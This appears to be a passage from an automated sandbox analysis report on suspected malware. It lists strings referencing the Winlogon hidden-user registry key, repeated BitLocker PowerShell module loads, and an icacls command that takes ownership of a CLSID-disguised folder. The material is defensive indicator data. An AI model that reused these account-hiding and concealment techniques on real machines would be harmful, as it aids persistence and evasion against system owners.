Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001F.00000002.2937124529.00007FFE116C4000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001F.00000002.2937124529.00007FFE116C4000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) \|\| (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exe

Process created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18

Source: C:\Users\user\Desktop\80P.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\80P.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
